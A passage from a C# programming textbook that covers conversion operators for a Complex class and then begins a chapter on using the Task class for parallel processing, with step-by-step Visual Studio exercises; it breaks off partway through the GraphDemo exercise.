GetHashCode method inherited from System.Object.
Note If the Error List window is not visible, click Error List on the
View menu.
5. Override the GetHashCode method in the Complex class by adding the
following shown here in bold. This implementation simply calls the
method inherited from the Object class, but you can provide your own
mechanism to generate a hash code for an object if you prefer.
class Complex
{
    ...
    public override int GetHashCode()
    {
        return base.GetHashCode();
    }
}
6. On the Build menu, click Rebuild Solution.
Verify that the solution now builds without reporting any warnings.
7. Display the Program.cs file in the Code and Text Editor window. Add
the following code shown in bold to the end of the doWork method:
static void doWork()
{
    ...
    if (temp == first)
    {
        Console.WriteLine("Comparison: temp == first");
    }
    else
    {
        Console.WriteLine("Comparison: temp != first");
    }

    if (temp == temp)
    {
        Console.WriteLine("Comparison: temp == temp");
    }
    else
    {
        Console.WriteLine("Comparison: temp != temp");
    }
}
Note The expression temp == temp generates the warning message
“Comparison made to same variable; did you mean to compare to
something else?” In this case, you can ignore the warning because
this comparison is intentional; it is to verify that the == operator is
working as expected.
8. On the Debug menu, click Start Without Debugging. Verify that the
final two messages displayed are these:
Comparison: temp != first
Comparison: temp == temp
9. Close the application, and return to Visual Studio 2017.
Understanding conversion operators
Sometimes, you need to convert an expression of one type to another. For
example, the following method is declared with a single double parameter:
class Example
{
    public static void MyDoubleMethod(double parameter)
    {
        ...
    }
}
You might reasonably expect that only values of type double could be
used as arguments when your code calls MyDoubleMethod, but this is not so.
The C# compiler also allows MyDoubleMethod to be called with an argument
of some other type, but only if the value of the argument can be converted to
a double. For example, if you provide an int argument, the compiler generates
code that converts the value of the argument to a double when the method is
called.
Providing built-in conversions
The built-in types have some built-in conversions. For example, as mentioned
previously, an int can be implicitly converted to a double. An implicit
conversion requires no special syntax and never throws an exception.
Example.MyDoubleMethod(42); // implicit int-to-double conversion
An implicit conversion is sometimes called a widening conversion
because the result is wider than the original value—it contains at least as
much information as the original value, and nothing is lost. In the case of int
and double, the range of double is greater than that of int, and all int values
have an equivalent double value. However, the converse is not true, and a
double value cannot be implicitly converted to an int:
class Example
{
    public static void MyIntMethod(int parameter)
    {
        ...
    }
}
...
Example.MyIntMethod(42.0); // compile-time error
When you convert a double to an int, you run the risk of losing
information, so the conversion will not be performed automatically.
(Consider what would happen if the argument to MyIntMethod were 42.5.
How should this be converted?) A double can be converted to an int, but the
conversion requires an explicit notation (a cast):
Example.MyIntMethod((int)42.0);
An explicit conversion is sometimes called a narrowing conversion
because the result is narrower than the original value (that is, it can contain
less information) and can throw an OverflowException exception if the
resulting value is out of the range of the target type. In C#, you can create
conversion operators for your own user-defined types to control whether it is
sensible to convert values to other types, and you can also specify whether
these conversions are implicit or explicit.
Implementing user-defined conversion operators
The syntax for declaring a user-defined conversion operator has some
similarities to that for declaring an overloaded operator, but it also has some
important differences. Here’s a conversion operator that allows an Hour
object to be implicitly converted to an int:
struct Hour
{
    ...
    public static implicit operator int(Hour from)
    {
        return from.value;
    }

    private int value;
}
A conversion operator must be public, and it must also be static. The type
from which you are converting is declared as the parameter (in this case,
Hour), and the type to which you are converting is declared as the type name
after the keyword operator (in this case, int). There is no return type specified
before the keyword operator.
When declaring your own conversion operators, you must specify whether
they are implicit conversion operators or explicit conversion operators. You
do this by using the implicit and explicit keywords. The Hour to int
conversion operator shown in the preceding example is implicit, meaning that
the C# compiler can use it without requiring a cast.
class Example
{
    public static void MyOtherMethod(int parameter) { ... }

    public static void Main()
    {
        Hour lunch = new Hour(12);
        Example.MyOtherMethod(lunch); // implicit Hour to int conversion
    }
}
If the conversion operator had been declared with explicit, the preceding
example would not have compiled because an explicit conversion operator
requires a cast.
Example.MyOtherMethod((int)lunch); // explicit Hour to int conversion
When should you declare a conversion operator as explicit or implicit? If
a conversion is always safe, does not run the risk of losing information, and
cannot throw an exception, it can be defined as an implicit conversion.
Otherwise, it should be declared as an explicit conversion. Converting from
an Hour to an int is always safe—every Hour has a corresponding int value—
so it makes sense for it to be implicit. An operator that converts a string to an
Hour should be explicit because not all strings represent valid Hours. (The
string “7” is fine, but how would you convert the string “Hello, World” to an
Hour?)
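Such a string conversion might look like the following sketch (illustrative only, not part of the exercises); int.Parse throws a FormatException for a string such as "Hello, World", which is precisely why the conversion has to be explicit:
struct Hour
{
    ...
    // Hypothetical explicit conversion; fails at run time for strings
    // that do not contain a valid integer.
    public static explicit operator Hour(string from) => new Hour(int.Parse(from));
    ...
    private int value;
}
You would invoke it with a cast, as in Hour seven = (Hour)"7";.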
Creating symmetric operators, revisited
Conversion operators provide you with an alternative way to resolve the
problem of providing symmetric operators. For example, instead of providing
three versions of operator+ (Hour + Hour, Hour + int, and int + Hour) for
the Hour structure, as shown earlier, you can provide a single version of
operator+ (that takes two Hour parameters) and an implicit int to Hour
conversion, like this:
struct Hour
{
    public Hour(int initialValue) => this.value = initialValue;

    public static Hour operator +(Hour lhs, Hour rhs) =>
        new Hour(lhs.value + rhs.value);

    public static implicit operator Hour(int from) => new Hour(from);
    ...
    private int value;
}
If you add an Hour to an int (in either order), the C# compiler
automatically converts the int to an Hour and then calls operator+ with two
Hour arguments, as demonstrated here:
void Example(Hour a, int b)
{
    Hour eg1 = a + b; // b converted to an Hour
    Hour eg2 = b + a; // b converted to an Hour
}
Writing conversion operators
In the final exercise of this chapter, you will add conversion operators to the
Complex class. You will start by writing a pair of conversion operators that
convert between the int type and the Complex type. Converting an int to a
Complex object is always a safe process and never loses information (because
an int is really just a complex number without an imaginary element). You
will implement this as an implicit conversion operator. However, the
converse is not true—to convert a Complex object into an int, you have to
discard the imaginary element. Thus, you will implement this conversion
operator as explicit.
Implement the conversion operators
1. Return to Visual Studio 2017 and display the Complex.cs file in the
Code and Text Editor window. Add the constructor shown in bold in the
code that follows to the Complex class, immediately after the existing
constructor and before the ToString method. This new constructor takes
a single int parameter, which it uses to initialize the Real property. The
Imaginary property is set to 0.
class Complex
{
    ...
    public Complex(int real)
    {
        this.Real = real;
        this.Imaginary = 0;
    }
    ...
}
2. Add the following implicit conversion operator shown in bold to the
Complex class.
class Complex
{
    ...
    public static implicit operator Complex(int from) => new Complex(from);
    ...
}
This operator converts from an int to a Complex object by returning a
new instance of the Complex class built using the constructor you
created in the previous step.
3. Add the following explicit conversion operator shown in bold to the
Complex class.
class Complex
{
    ...
    public static explicit operator int(Complex from) => from.Real;
    ...
}
This operator takes a Complex object and returns the value of the Real
property. This conversion discards the imaginary element of the
complex number.
4. Display the Program.cs file in the Code and Text Editor window. Add
the following code shown in bold to the end of the doWork method:
static void doWork()
{
    ...
    Console.WriteLine($"Current value of temp is {temp}");
    if (temp == 2)
    {
        Console.WriteLine("Comparison after conversion: temp == 2");
    }
    else
    {
        Console.WriteLine("Comparison after conversion: temp != 2");
    }

    temp += 2;
    Console.WriteLine($"Value after adding 2: temp = {temp}");
}
These statements test the implicit operator that converts an int to a
Complex object. The if statement compares a Complex object to an int.
The compiler generates code that converts the int into a Complex object
first and then invokes the == operator of the Complex class. The
statement that adds 2 to the temp variable converts the int value 2 into a
Complex object and then uses the + operator of the Complex class.
5. Add the following statements shown in bold to end of the doWork
method:
static void doWork()
{
    ...
    int tempInt = temp;
    Console.WriteLine($"Int value after conversion: tempInt == {tempInt}");
}
The first statement attempts to assign a Complex object to an int
variable.
6. On the Build menu, click Rebuild Solution.
The solution fails to build, and the compiler reports the following error
in the Error List window:
Cannot implicitly convert type 'ComplexNumbers.Complex' to 'int'. An
explicit conversion exists (are you missing a cast?)
The operator that converts from a Complex object to an int is an explicit
conversion operator, so you must specify a cast.
7. Modify the statement that attempts to store a Complex value in an int
variable to use a cast, like this:
int tempInt = (int)temp;
8. On the Debug menu, click Start Without Debugging. Verify that the
solution now builds and that the final four messages displayed look like
this:
Current value of temp is (2 + 0i)
Comparison after conversion: temp == 2
Value after adding 2: temp = (4 + 0i)
Int value after conversion: tempInt == 4
9. Close the application, and return to Visual Studio 2017.
Summary
In this chapter, you learned how to overload operators and provide
functionality specific to a class or structure. You implemented a number of
common arithmetic operators, and you also created operators with which you
can compare instances of a class. Finally, you learned how to create implicit
and explicit conversion operators.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 23, “Improving throughput by using
tasks.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
Implement an operator
    Write the keywords public and static, followed by the return type,
    followed by the operator keyword, followed by the operator symbol being
    declared, followed by the appropriate parameters between parentheses.
    Implement the logic for the operator in the body of the method. For
    example:

    class Complex
    {
        ...
        public static bool operator ==(Complex lhs, Complex rhs)
        {
            ... // Implement logic for == operator
        }
        ...
    }

Define a conversion operator
    Write the keywords public and static, followed by the keyword implicit
    or explicit, followed by the operator keyword, followed by the type to
    which the data is being converted, followed by the type from which the
    data is being converted as a single parameter between parentheses. For
    example:

    class Complex
    {
        ...
        public static implicit operator Complex(int from)
        {
            ... // code to convert from an int
        }
        ...
    }
PART IV
Building Universal Windows
Platform applications with C#
So far, you have gained a thorough grounding in the syntax and semantics of
the C# language. It’s now time to examine how you can use this knowledge
to take advantage of the features that Windows 10 provides for building
applications that run unchanged on devices ranging from a desktop PC to a
smartphone. You can construct applications that run in different
environments by using the Universal Windows Platform (UWP) application
framework. UWP applications can detect and adapt to the hardware on which
they execute. They can receive input through a touch-sensitive screen or by
using voice commands, and a UWP app can be designed to be aware of the
location and orientation of the device on which it is running. You can also
build cloud-connected applications; these are applications that are not tied to
a specific computer but can follow users when they sign in on another device.
In short, Visual Studio provides the tools for developing highly mobile,
highly graphical, highly connected applications that can run almost
anywhere.
Part IV introduces you to the requirements of building UWP applications.
You will see examples of the asynchronous model of programming
developed as part of the .NET Framework. You will also learn how to
integrate voice activation into your application and how to build a UWP
application that connects to the cloud to retrieve and present complex
information in a natural and easily navigable style.
CHAPTER 23
Improving throughput by using
tasks
After completing this chapter, you will be able to:
Describe the benefits of implementing parallel operations in an
application.
Use the Task class to create and run parallel operations in an
application.
Use the Parallel class to parallelize some common programming
constructs.
Cancel long-running tasks and handle exceptions raised by parallel
operations.
In the bulk of the preceding chapters in this book, you’ve learned how to use
C# to write programs that run in a single-threaded manner. By single-
threaded, I mean that at any one point in time, a program has been executing
a single instruction. This might not always be the most efficient approach for
an application to take. If you have the appropriate processing resources
available, some applications might run more quickly if you divide them into
parallel paths of execution that can run concurrently. This chapter is
concerned with improving throughput in your applications by maximizing the
use of available processing power. Specifically, in this chapter, you will learn
how to use Task objects to apply effective multitasking to computationally
intensive applications.
Why perform multitasking by using parallel
processing?
There are two primary reasons why you might want to perform multitasking
in an application:
To improve responsiveness A long-running operation may involve
tasks that do not require processor time. Common examples include
I/O-bound operations such as reading from or writing to a local disk or
sending and receiving data across a network. In both of these cases, it
does not make sense to have a program burn CPU cycles waiting for
the operation to complete when the program could be doing something
more useful instead (such as responding to user input). Most users of
mobile devices take this form of responsiveness for granted and don’t
expect their tablet to simply halt while it is sending and receiving
email, for example. Chapter 24, “Improving response time by
performing asynchronous operations,” discusses these features in more
detail.
To improve scalability If an operation is CPU bound, you can
improve scalability by making efficient use of the processing resources
available and using these resources to reduce the time required to
execute the operation. A developer can determine which operations
include tasks that can be performed in parallel and arrange for these
elements to be run concurrently. As more computing resources are
added, more instances of these tasks can be run in parallel. Until
relatively recently, this model was suitable only for scientific and
engineering systems that either had multiple CPUs or were able to
spread the processing across different computers networked together.
However, most modern computing devices now contain powerful
CPUs that are capable of supporting true multitasking, and many
operating systems provide primitives that enable you to parallelize
tasks quite easily.
The rise of the multicore processor
At the turn of the century, the cost of a decent personal computer was in the
range of $800 to $1,500. Today, a decent personal computer still costs about
the same, even after 17 years of price inflation. The specification of a typical
computer these days is likely to include a processor running at a speed of
between 2 GHz and 3 GHz, over 1,000 GB of hard disk storage (possibly
using solid-state technology, for speed), 8 GB of RAM, high-speed and high-
resolution graphics, fast network interfaces, and a rewritable DVD drive.
Seventeen years ago, the processor speed for a typical machine was between
500 MHz and 1 GHz, 80 GB was a large hard disk, Windows ran quite
happily with 256 MB or less of RAM, and rewritable CD drives cost well
over $100. (Rewritable DVD drives were rare and extremely expensive.) This
is the joy of technological progress: ever faster and more powerful hardware
at cheaper and cheaper prices.
This is not a new trend. In 1965, Gordon E. Moore, co-founder of Intel,
wrote a paper titled “Cramming More Components onto Integrated Circuits,”
which discussed how the increasing miniaturization of components enabled
more transistors to be embedded on a silicon chip, and how the falling costs
of production as the technology became more accessible would lead
economics to dictate squeezing as many as 65,000 components onto a single
chip by 1975. Moore’s observations lead to the dictum frequently referred to
as Moore’s Law, which states that the number of transistors that can be
placed inexpensively on an integrated circuit will increase exponentially,
doubling approximately every two years. (Actually, Gordon Moore was
initially more optimistic than this, postulating that the volume of transistors
was likely to double every year, but he later modified his calculations.) The
ability to pack transistors together led to the ability to pass data between them
more quickly. This meant we could expect to see chip manufacturers produce
faster and more powerful microprocessors at an almost unrelenting pace,
enabling software developers to write ever more complicated software that
would run more quickly.
Moore’s Law concerning the miniaturization of electronic components
still holds, even half a century later. However, physics has started to
intervene. A limit occurs when it is not possible to transmit signals between
transistors on a single chip any faster, no matter how small or densely packed
they are. To a software developer, the most noticeable result of this limitation
is that processors have stopped getting faster. Ten years ago, a fast processor
ran at 3 GHz. Today, a fast processor still runs at 3 GHz.
The limit to the speed at which processors can transmit data between
components has caused chip companies to look at alternative mechanisms for
increasing the amount of work a processor can do. The result is that most
modern processors now have two or more processor cores. Effectively, chip
manufacturers have put multiple processors on the same chip and added the
necessary logic to enable them to communicate and coordinate with one
another. Quad-core (four cores) and eight-core processors are now common.
Chips with 16, 32, and 64 cores are available, and the price of dual-core and
quad-core processors is now sufficiently low that they are an expected
element in laptops, tablets, and smart cell phones. So, although processors
have stopped speeding up, you can now expect to get more of them on a
single chip.
What does this mean to a developer writing C# applications?
In the days before multicore processors, you could speed up a single-
threaded application simply by running it on a faster processor. With
multicore processors, this is no longer the case. A single-threaded application
will run at the same speed on a single-core, dual-core, or quad-core processor
that all have the same clock frequency. The difference is that on a dual-core
processor, as far as your application is concerned, one of the processor cores
will be sitting around idle, and on a quad-core processor, three of the cores
will be simply ticking away, waiting for work. To make the best use of
multicore processors, you need to write your applications to take advantage
of multitasking.
Implementing multitasking by using the Microsoft
.NET Framework
Multitasking is the ability to do more than one thing at the same time. It is
one of those concepts that is easy to describe but until recently has been
difficult to implement.
In the optimal scenario, an application running on a multicore processor
performs as many concurrent tasks as there are processor cores available,
keeping each of the cores busy. However, you need to consider many issues
to implement concurrency, including the following:
How can you divide an application into a set of concurrent operations?
How can you arrange for a set of operations to execute concurrently, on
multiple processors?
How can you ensure that you attempt to perform only as many
concurrent operations as there are processors available?
If an operation is blocked (such as while waiting for I/O to complete),
how can you detect this and arrange for the processor to run a different
operation rather than sit idle?
How can you determine when one or more concurrent operations have
completed?
To an application developer, the first question is a matter of application
design. The remaining questions depend on the programmatic infrastructure.
Microsoft provides the Task class and a collection of associated types in the
System.Threading.Tasks namespace to help address these issues.
Important The point about application design is fundamental. If an
application is not designed with multitasking in mind, then it doesn’t
matter how many processor cores you throw at it, it will not run any
faster than it would on a single-core machine.
Tasks, threads, and the ThreadPool
The Task class is an abstraction of a concurrent operation. You create a Task
object to run a block of code. You can instantiate multiple Task objects and
start them running in parallel if sufficient processors or processor cores are
available.
Note From now on, I will use the term processor to refer to either a
single-core processor or a single processor core on a multicore
processor.
Internally, the Windows Runtime (WinRT) implements tasks and
schedules them for execution by using Thread objects and the ThreadPool
class. Multithreading and thread pools have been available with the .NET
Framework since version 1.0, and if you are building traditional desktop
applications, you can use the Thread class in the System.Threading
namespace directly in your code. However, the Thread class is not available
for Universal Windows Platform (UWP) apps; instead, you use the Task
class.
The Task class provides a powerful abstraction for threading with which
you can easily distinguish between the degree of parallelization in an
application (the tasks) and the units of parallelization (the threads). On a
single-processor computer, these items are usually the same. However, on a
computer with multiple processors or with a multicore processor, they are
different. If you design a program based directly on threads, you will find that
your application might not scale very well; the program will use the number
of threads you explicitly create, and the operating system will schedule only
that number of threads. This can lead to overloading and poor response time
if the number of threads greatly exceeds the number of available processors,
or to inefficiency and poor throughput if the number of threads is less than
the number of processors.
WinRT optimizes the number of threads required to implement a set of
concurrent tasks and schedules them efficiently according to the number of
available processors. It implements a queuing mechanism to distribute the
workload across a set of threads allocated to a thread pool (implemented by
using a ThreadPool object). When a program creates a Task object, the task is
added to a global queue. When a thread becomes available, the task is
removed from the global queue and is executed by that thread. The
ThreadPool class implements a number of optimizations and uses a work-
stealing algorithm to ensure that threads are scheduled efficiently.
Note The ThreadPool class was available in previous editions of the
.NET Framework, but it was enhanced significantly in .NET
Framework 4.0 to support Tasks.
You should note that the number of threads created to handle your tasks is
not necessarily the same as the number of processors. Depending on the
nature of the workload, one or more processors might be busy performing
high-priority work for other applications and services. Consequently, the
optimal number of threads for your application might be less than the number
of processors in the machine. Alternatively, one or more threads in an
application might be waiting for long-running memory access, I/O, or
network operation to complete, leaving the corresponding processors free. In
this case, the optimal number of threads might be more than the number of
available processors. WinRT follows an iterative strategy, known as a hill-
climbing algorithm, to dynamically determine the ideal number of threads for
the current workload.
The important point is that all you have to do in your code is divide, or
partition, your application into tasks that can be run in parallel. WinRT takes
responsibility for creating the appropriate number of threads based on the
processor architecture and workload of your computer, associating your tasks
with these threads and arranging for them to be run efficiently. It does not
matter if you partition your work into too many tasks because WinRT will
attempt to run only as many concurrent threads as is practical; in fact, you are
encouraged to overpartition your work because this will help ensure that your
application scales if you move it to a computer that has more processors
available.
Creating, running, and controlling tasks
You can create Task objects by using the Task constructor. The Task
constructor is overloaded, but all versions expect you to provide an Action
delegate as a parameter. Chapter 20, “Decoupling application logic and
handling events,” illustrates that an Action delegate references a method that
does not return a value. A Task object invokes this delegate when it is
scheduled to run. The following example creates a Task object that uses a
delegate to run the method called doWork:
Task task = new Task(doWork);
...
private void doWork()
{
    // The task runs this code when it is started
    ...
}
Tip The default Action type references a method that takes no
parameters. Other overloads of the Task constructor take an
Action<object> parameter representing a delegate that refers to a
method that takes a single object parameter. With these overloads, you
can pass data into the method run by the task. The following code
shows an example:
Action<object> action;
action = doWorkWithObject;
object parameterData = ...;
Task task = new Task(action, parameterData);
...
private void doWorkWithObject(object o)
{
    ...
}
After you create a Task object, you can set it running by using the Start
method, like this:
Task task = new Task(...);
task.Start();
The Start method is overloaded, and you can optionally specify a
TaskCreationOptions object to provide hints about how to schedule and run
the task.
More Info
For more information about the TaskCreationOptions enumeration,
consult the documentation describing the .NET Framework class library
that is provided with Visual Studio.
Creating and running a task is a very common process, and the Task class
provides the static Run method with which you can combine these operations.
The Run method takes an Action delegate specifying the operation to perform
(like the Task constructor) but starts the task running immediately. It returns a
reference to the Task object. You can use it like this:
Task task = Task.Run(() => doWork());
When the method run by the task completes, the task finishes and the thread
used to run the task can be recycled to execute another task.
When a task completes, you can arrange for another task to be scheduled
immediately by creating a continuation. To do this, call the ContinueWith
method of a Task object. When the action performed by the Task object
completes, the scheduler automatically creates a new Task object to run the
action specified by the ContinueWith method. The method specified by the
continuation expects a Task parameter, and the scheduler passes into the
method a reference to the task that completed. The value returned by
ContinueWith is a reference to the new Task object. The following code
example creates a Task object that runs the doWork method and specifies a
continuation that runs the doMoreWork method in a new task when the first
task completes:
Task task = new Task(doWork);
task.Start();
Task newTask = task.ContinueWith(doMoreWork);
...
private void doWork()
{
    // The task runs this code when it is started
    ...
}
...
private void doMoreWork(Task task)
{
    // The continuation runs this code when doWork completes
    ...
}
The ContinueWith method is heavily overloaded, and you can provide
some parameters that specify additional items, including a
TaskContinuationOptions value. The TaskContinuationOptions type is an
enumeration that contains a superset of the values in the
TaskCreationOptions enumeration. The additional values available include
the following:
NotOnCanceled and OnlyOnCanceled The NotOnCanceled option
specifies that the continuation should run only if the previous action
completes and is not canceled, and the OnlyOnCanceled option
specifies that the continuation should run only if the previous action is
canceled. The section “Canceling tasks and handling exceptions” later
in this chapter describes how to cancel a task.
NotOnFaulted and OnlyOnFaulted The NotOnFaulted option
indicates that the continuation should run only if the previous action
completes and does not throw an unhandled exception. The
OnlyOnFaulted option causes the continuation to run only if the
previous action throws an unhandled exception. The section
“Canceling tasks and handling exceptions” provides more information
on how to manage exceptions in a task.
NotOnRanToCompletion and OnlyOnRanToCompletion The
NotOnRanToCompletion option specifies that the continuation should
run only if the previous action does not complete successfully; it must
either be canceled or throw an exception. OnlyOnRanToCompletion
causes the continuation to run only if the previous action completes
successfully.
The following code example shows how to add a continuation to a task that
runs only if the initial action does not throw an unhandled exception:
Task task = new Task(doWork);
task.ContinueWith(doMoreWork, TaskContinuationOptions.NotOnFaulted);
A common requirement of applications that invoke operations in parallel
is to synchronize tasks. The Task class provides the Wait method, which
implements a simple task coordination mechanism. Using this method, you
can suspend execution of the current thread until the specified task
completes, like this:
Task task2 = ...;
task2.Start();
...
task2.Wait(); // Wait at this point until task2 completes
You can wait for a set of tasks by using the static WaitAll and WaitAny
methods of the Task class. Both methods take a params array containing a set
of Task objects. The WaitAll method waits until all specified tasks have
completed, and WaitAny stops until at least one of the specified tasks has
finished. You use them like this:
Task.WaitAll(task, task2); // Wait for both task and task2 to complete
Task.WaitAny(task, task2); // Wait for either task or task2 to complete
Using the Task class to implement parallelism
In the next exercise, you will use the Task class to parallelize processor-
intensive code in an application, and you will see how this parallelization
reduces the time taken for the application to run by spreading the
computations across multiple processor cores.
The application, called GraphDemo, consists of a page that uses an Image
control to display a graph. The application plots the points for the graph by
performing a complex calculation.
Note The exercises in this chapter are intended to be run on a computer
with a multicore processor. If you have only a single-core CPU, you
will not observe the same effects. Also, you should not start any
additional programs or services between exercises because these might
affect the results that you see.
Examine and run the GraphDemo single-threaded application
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the GraphDemo solution, which is located in the \Microsoft
Press\VCSBS\Chapter 23\GraphDemo folder in your Documents folder.
This is a Universal Windows Platform app.
3. In Solution Explorer, in the GraphDemo project, double-click the file
MainPage.xaml to display the form in the Design View window.
Apart from the Grid control defining the layout, the form contains the
following important controls:
• An Image control called graphImage. This image control displays the
graph rendered by the application.
• A Button control called plotButton. The user clicks this button to
generate the data for the graph and display it in the graphImage
control.
Note In the interest of keeping the operation of the application in
this exercise simple, it displays the button on the page. In a
production UWP app, buttons such as this should be located on a
command bar.
• A TextBlock control called duration. The application displays the time
taken to generate and render the data for the graph in this label.
4. In Solution Explorer, expand the MainPage.xaml file and then double-
click MainPage.xaml.cs to display the code for the form in the Code and
Text Editor window.
The form uses a WriteableBitmap object (defined in the
Windows.UI.Xaml.Media.Imaging namespace) called graphBitmap to
render the graph. The code in the plotButton_Click method creates this
object, but the class instance variables pixelWidth and pixelHeight
specify the horizontal and vertical resolution, respectively, for the
WriteableBitmap object:
public sealed partial class MainPage : Page
{
    // Reduce pixelWidth and pixelHeight if there is insufficient memory available
    private int pixelWidth = 10000;
    private int pixelHeight = 7500;
    ...
}
Note This application was developed and tested on a desktop
computer with 8 GB of memory (it was also tested on a 4 GB
machine). If your computer has less memory than this available,
you might need to reduce the values in the pixelWidth and
pixelHeight variables; otherwise, the application might generate
OutOfMemoryException exceptions, causing the application to
terminate without warning.
Don’t try to increase these values if you have a bigger
machine; the UWP model has a limit on the amount of memory
that an application can use (currently around 2 GB, even on a
desktop computer), and if you exceed this value your application
might be terminated without warning. The rationale behind this
limitation is that many devices on which UWP applications run are
memory constrained, and a single app should not be allowed to
consume all of the memory resources available to the detriment of
other apps.
5. Examine the code for the plotButton_Click method:
private void plotButton_Click(object sender, RoutedEventArgs e)
{
    ...
    Random rand = new Random();
    redValue = (byte)rand.Next(0xFF);
    greenValue = (byte)rand.Next(0xFF);
    blueValue = (byte)rand.Next(0xFF);

    int dataSize = bytesPerPixel * pixelWidth * pixelHeight;
    byte[] data = new byte[dataSize];

    Stopwatch watch = Stopwatch.StartNew();
    generateGraphData(data);
    duration.Text = $"Duration (ms): {watch.ElapsedMilliseconds}";

    WriteableBitmap graphBitmap = new WriteableBitmap(pixelWidth, pixelHeight);
    using (Stream pixelStream = graphBitmap.PixelBuffer.AsStream())
    {
        pixelStream.Seek(0, SeekOrigin.Begin);
        pixelStream.Write(data, 0, data.Length);
        graphBitmap.Invalidate();
        graphImage.Source = graphBitmap;
    }
    ...
}
This method runs when the user clicks the plotButton button. (You will
click this button several times later in the exercise, so you can see that a
new version of the graph is drawn each time.) The method generates a
random set of values for the red, green, and blue intensity of the points
that are plotted. (The graph will be a different color each time you click
this button.)
The next two lines instantiate a byte array that will hold the data for the
graph. The size of this array depends on the resolution of the
WriteableBitmap object, determined by the pixelWidth and pixelHeight
fields. Additionally, this size has to be scaled by the amount of memory
required to render each pixel; the WriteableBitmap class uses 4 bytes for
each pixel, which specify the relative red, green, and blue intensity of
each pixel and the alpha blending value of the pixel. (The alpha blending
value determines the transparency and brightness of the pixel.)
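With the default settings, this works out to 10,000 × 7,500 × 4 = 300,000,000 bytes, or roughly 286 MB, which is why the preceding note warns about memory consumption.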
The watch variable is a System.Diagnostics.Stopwatch object. The
Stopwatch type is useful for timing operations. The static StartNew
method of the Stopwatch type creates a new instance of a Stopwatch
object and starts it running. You can query the running time of a
Stopwatch object by examining the ElapsedMilliseconds property.
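As a minimal sketch of this pattern (the doCalculation method here is a hypothetical stand-in for whatever operation you want to time), the usage looks like this:

Stopwatch watch = Stopwatch.StartNew(); // create the stopwatch and start it running
doCalculation();                        // hypothetical operation being timed
Console.WriteLine($"Elapsed: {watch.ElapsedMilliseconds} ms");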
The generateGraphData method populates the data array with the data
for the graph to be displayed by the WriteableBitmap object. You will
examine this method in the next step.
When the generateGraphData method has completed, the elapsed time
(in milliseconds) appears in the duration TextBlock control.
The final block of code creates the graphBitmap WriteableBitmap
object. The information held in the data array is copied into this object
for rendering. The simplest technique is to create an in-memory stream
that can be used to populate the PixelBuffer property of the
WriteableBitmap object. You can then use the Write method of this
stream to copy the contents of the data array into this buffer. The
Invalidate method of the WriteableBitmap class requests that the
operating system redraws the bitmap by using the information held in
the buffer. The Source property of an Image control specifies the data
that the Image control should display. The final statement sets the
Source property to the WriteableBitmap object.
6. Examine the code for the generateGraphData method, shown here:
private void generateGraphData(byte[] data)
{
    double a = pixelWidth / 2;
    double b = a * a;
    double c = pixelHeight / 2;
    for (double x = 0; x < a; x++)
    {
        double s = x * x;
        double p = Math.Sqrt(b - s);
        for (double i = -p; i < p; i += 3)
        {
            double r = Math.Sqrt(s + i * i) / a;
            double q = (r - 1) * Math.Sin(24 * r);
            double y = i / 3 + (q * c);
            plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
            plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
        }
    }
}
This method performs a series of calculations to plot the points for a
rather complex graph. (The actual calculation is unimportant; it just
generates a graph that looks attractive.) As it calculates each point, it
calls the plotXY method to set the appropriate bytes in the data array that
correspond to these points. The points for the graph are reflected around
the graph's vertical axis, so the plotXY method is called twice for each calculation:
once for the positive value of the x-coordinate, and once for the negative
value.
7. Examine the plotXY method:
private void plotXY(byte[] data, int x, int y)
{
    int pixelIndex = (x + y * pixelWidth) * bytesPerPixel;
    data[pixelIndex] = blueValue;
    data[pixelIndex + 1] = greenValue;
    data[pixelIndex + 2] = redValue;
    data[pixelIndex + 3] = 0xBF;
}
This method sets the appropriate bytes in the data array that correspond
to the x- and y-coordinates passed in as parameters. Each point plotted
corresponds to a pixel, and each pixel consists of 4 bytes, as described
earlier. Any pixels left unset are displayed as black. The value 0xBF for
the alpha blend byte indicates that the corresponding pixel should be
displayed with a moderate intensity; if you decrease this value, the pixel
will become fainter, while setting the value to 0xFF (the maximum
value for a byte) will display the pixel at its brightest intensity.
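(For reference, 0xBF is 191 in decimal, or about 75 percent of the maximum byte value of 0xFF, which is 255.)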
8. On the Debug menu, click Start Without Debugging to build and run the
application.
9. When the GraphDemo window appears, click Plot Graph, and then wait.
Please be patient. The application typically takes a couple of seconds to
generate and display the graph, and the application is unresponsive
while this occurs. (Chapter 24 explains why this is, and also explains
how you can avoid this behavior.) The following image shows the
graph. Note the value in the Duration (ms) label in the following figure.
In this case, the application took 1206 milliseconds (ms) to generate the
data. Note that this duration does not include the time to actually render
the graph, which might be another few seconds.
Note The application was run on a computer with a multicore
processor running at 3.10 GHz. Your times might vary if you are
using a slower or faster processor with a different number of cores.
10. Click Plot Graph again and take note of the time required to redraw the
graph. Repeat this action several times to obtain an average value.
Note You might find that occasionally the graph takes an extended
time to appear. This tends to occur if you are running close to the
memory capacity of your computer and Windows has to page data
between memory and disk. If you encounter this phenomenon,
discard this time and do not include it when calculating your
average.
11. Leave the application running and right-click an empty area of the
Windows taskbar. On the shortcut menu that appears, click Task
Manager.
Note An alternative way to launch Task Manager is to type Task
Manager into the Windows Search box in the taskbar, and then
press Enter.
12. In the Task Manager window, click the Performance tab and display the
CPU utilization. If the Performance tab is not visible, click More
Details. Right-click the CPU Utilization graph, point to Change Graph
To, and then click Overall Utilization. This action causes Task Manager
to display the utilization of all the processor cores running on your
computer in a single chart. Wait for a minute or so for the CPU
performance to settle down. The following image shows the
Performance tab of Task Manager configured in this way:
13. Return to the GraphDemo application and adjust the size and position of
the application window and the Task Manager window so that both are
visible.
14. Wait for the CPU utilization to level off, and then, in the GraphDemo
window, click Plot Graph.
15. Wait for the CPU utilization to level off again, and then click Plot Graph
again.
16. Repeat step 15 several times, waiting for the CPU utilization to level off
between clicks.
17. In the Task Manager window, observe the CPU utilization. Your results
will vary, but on a dual-core processor, the CPU utilization will
probably be somewhere around 50–55 percent while the graph is
being generated. On a quad-core machine, the CPU utilization will
likely be somewhere between 25 and 30 percent, as shown in the image
that follows. Note that other factors, such as the type of graphics card in
your computer, can also impact the performance:
18. Close the application and return to Visual Studio 2017.
You now have a baseline for the time the application takes to perform its
calculations. However, it is clear from the CPU usage displayed by Task
